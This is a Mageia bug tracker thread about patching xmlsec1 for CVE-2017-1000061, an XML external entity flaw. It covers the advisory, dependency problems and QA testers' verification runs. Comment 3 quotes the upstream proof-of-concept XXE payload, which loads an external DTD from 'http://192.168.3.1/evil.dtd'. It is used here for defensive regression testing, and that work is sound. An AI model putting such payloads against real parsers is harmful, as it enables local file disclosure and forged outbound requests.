Bug 26174 - xmlsec1 new security issue CVE-2017-1000061
Summary: xmlsec1 new security issue CVE-2017-1000061
Status: NEW
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 7
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA7-64-OK
Keywords: validated_update
Depends on:
Blocks:
 
Reported: 2020-02-07 21:59 CET by David Walser
Modified: 2020-02-25 00:08 CET (History)
4 users (show)

See Also:
Source RPM: xmlsec1-1.2.28-1.mga7.src.rpm
CVE:
Status comment:


Attachments

Description David Walser 2020-02-07 21:59:56 CET
Fedora has issued an advisory on February 3:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3PWHBRWXR3RNPHDSTQI6UWDG5ETOQ7VR/

The issue is fixed upstream in 1.2.29.

Mageia 7 is also affected.
David Walser 2020-02-07 22:00:09 CET

Whiteboard: (none) => MGA7TOO

Comment 1 David GEIGER 2020-02-08 08:35:04 CET
Done for both Cauldron and mga7!

CC: (none) => geiger.david68210

Comment 2 David Walser 2020-02-08 13:07:38 CET
Advisory:
========================

Updated xmlsec1 packages fix security vulnerability:

It was discovered xmlsec1's use of libxml2 inadvertently enabled external
entity expansion (XXE) along with validation. An attacker could craft an XML
file that would cause xmlsec1 to try and read local files or HTTP/FTP URLs,
leading to information disclosure or denial of service (CVE-2017-1000061).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3PWHBRWXR3RNPHDSTQI6UWDG5ETOQ7VR/
========================

Updated packages in core/updates_testing:
========================
xmlsec1-1.2.29-1.mga7
libxmlsec1_1-1.2.29-1.mga7
libxmlsec1-openssl1-1.2.29-1.mga7
libxmlsec1-nss1-1.2.29-1.mga7
libxmlsec1-gnutls1-1.2.29-1.mga7
libxmlsec1-gcrypt1-1.2.29-1.mga7
libxmlsec1-devel-1.2.29-1.mga7

from xmlsec1-1.2.29-1.mga7.src.rpm

Whiteboard: MGA7TOO => (none)
Assignee: java => qa-bugs
Version: Cauldron => 7

Comment 3 Len Lawrence 2020-02-08 18:25:26 CET
Mageia7, x86_64

Before the update installing the devel package failed with this message:
The following packages can't be installed because they depend on packages
that are older than the installed ones:
lib64xslt-devel-1.1.33-2.1.mga7
lib64xmlsec1-devel-1.2.28-1.mga7

The others install OK.
Tried to run the PoC but had difficulties:
CVE-2017-1000061
https://github.com/lsh123/xmlsec/issues/43
$ cat input.xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;]>
$ xmlsec1 --verify --output /tmp/output.xml input.xml
....
Failed to find xmlsec-openssl library.

/usr/lib64/libxmlsec1-openssl.so.1.2.28 is installed.

Cannot unravel this.
And also, re lib64xmlsec1-devel, removing lib64xslt-devel would take 148 other packages with it.  Had hoped to reinstall it to pick up the correct package, assuming that the xslt one is the source of the problem.
$ urpmq --requires lib64xmlsec1-devel
....
pkgconfig(libxslt)[>= 1.0.20]

$ locate libxslt
/usr/lib64/libxslt.so.1.1.33

Why is it complaining?

Recursive query lists lib64xslt1
$ rpm -qa | grep lib64xslt1
lib64xslt1-1.1.33-2.2.mga7

CC: (none) => tarazed25

Len Lawrence 2020-02-09 12:58:56 CET

Keywords: (none) => feedback

David Walser 2020-02-21 17:43:48 CET

Assignee: qa-bugs => geiger.david68210
CC: (none) => qa-bugs
Keywords: feedback => (none)

David Walser 2020-02-21 17:56:22 CET

Status comment: (none) => Update built, but CLI tool fails to find its own library

Comment 4 David GEIGER 2020-02-22 09:35:45 CET
(In reply to Len Lawrence from comment #3)

> Failed to find xmlsec-openssl library.
> 
> /usr/lib64/libxmlsec1-openssl.so.1.2.28 is installed.


Shouldn't it be /usr/lib64/libxmlsec1-openssl.so.1.2.29 ??
Comment 5 David Walser 2020-02-22 15:02:04 CET
Len, did you ever actually test the update?
Comment 6 Len Lawrence 2020-02-23 17:34:16 CET
No.  I was waiting to resolve the missing dependency.  It looks like it was never installed so I have installed it now.  Don't ask.
Comment 7 Len Lawrence 2020-02-23 17:47:29 CET
@David Geiger: in reply to comment 4

It is all coming back into focus now.  It was the before update situation which was the problem.  Testing the PoC against the 1.1.28 version failed because the xmlsec-openssl library could not be found even though libxmlsec1-openssl.so.1.2.28 was installed.  Why would it complain?

I felt uneasy about proceeding with testing in case something was seriously wrong.
Comment 8 David Walser 2020-02-23 18:01:18 CET
It's only a problem if something is wrong with the update.

Assignee: geiger.david68210 => qa-bugs
CC: qa-bugs => (none)
Status comment: Update built, but CLI tool fails to find its own library => (none)

Comment 9 Len Lawrence 2020-02-23 19:09:53 CET
Continuing from comment 3:

Updated the seven packages and ran the PoC.
$ xmlsec1 --verify --output /tmp/output.xml input.xml
func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=59:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='http://192.168.3.1/evil.dtd'; xml error: 0: NULL
input.xml:2: parser error : Start tag expected, '<' not found

^
func=xmlSecParseFile:file=parser.c:line=414:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=input.xml; xml error: 4: Start tag expected, '<' not found

Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

This agrees with the upstream test but we have no "before" example to compare it with.

That is only half of the test anyway.  It needs a server on localhost to listen on port 80.  Don't know how to set that up.

Not knowing anything about this package it seemed appropriate to use the command from the PoC.
Tried a few local XML files but failed every time.
$ xmlsec1 --verify --output /tmp/output.xml workspace.xml
Error: failed to find default node with name="Signature"
Error: failed to load document "workspace.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "workspace.xml"

The help indicates that verify refers to signed documents which these are not.  Fiddled with an XML file as data and tried to create a document with a default template signature with the --sign-tmpl option but that fell flat.
$ xmlsec1 -output test1.xml --sign-tmpl workspace.xml

Need to do more research.
Comment 10 Len Lawrence 2020-02-23 21:52:00 CET
Tried to verify various pem files found in the system.  These fail on missing start tag.  Looks like these are encrypted certificates.  Decrypting does not work.

Not making much headway with this.

The best I could do was to follow part of the tutorial at  https://users.dcc.uchile.cl/~pcamacho/tutorial/web/xmlsec/xmlsec.html.

Copied down the files and:
$ xmlsec1 --sign --output doc-signed.xml --privkey-pem userkey.pem doc.xml
Enter password for "userkey.pem" file:
$ ls
cacert.pem  doc-signed.xml  doc.xml  pub-userkey.pem  usercert.p12  userkey.pem

The generated XML file doc-signed.xml corresponded with the example online.
$ cat doc-signed.xml
<?xml version="1.0"?>
<References>
 <Book>
  <Author>
   <FirstName>Bruce</FirstName>
    <LastName>Schneier</LastName>
  </Author>
  <Title>Applied Cryptography</Title>
[..]
</RSAKeyValue>
</KeyValue>
  </KeyInfo>
 </Signature>
</References>

$ xmlsec1 --verify doc-signed.xml
OK
SignedInfo References (ok/all): 1/1
Manifests References (ok/all): 0/0

Deliberately corrupted the Title and Signature and tried again.
$ xmlsec1 --verify doc-signed.xml
func=xmlSecOpenSSLEvpDigestVerify:file=digests.c:line=280:obj=sha1:subj=unknown:error=12:invalid data:data and digest do not match
FAIL
SignedInfo References (ok/all): 0/1
Manifests References (ok/all): 0/0
Error: failed to verify file "doc-signed.xml"

$ cp doc.xml doc-id.xml

Made a benign change to doc-id.xml, adding an id to the Book node.
$ xmlsec1 --sign --output doc-id-signed.xml --privkey-pem userkey.pem doc-id.xml
Enter password for "userkey.pem" file: 
$ ll doc-id-signed.xml
$ ll doc-id-signed.xml
-rw-r--r-- 1 lcl lcl 1387 Feb 23 20:43 doc-id-signed.xml
$ xmlsec1 --verify doc-id-signed.xml
OK
SignedInfo References (ok/all): 1/1
Manifests References (ok/all): 0/0

There is more, but to avoid getting out of my depth I am sending this on.

Whiteboard: (none) => MGA7-64-OK

Comment 11 Thomas Andrews 2020-02-25 00:08:57 CET
Thank you for all your effort, Len. I'm going to go ahead and validate.

Advisory in Comment 2.

Keywords: (none) => validated_update
CC: (none) => andrewsfarm, sysadmin-bugs


Note You need to log in before you can comment on or make changes to this bug.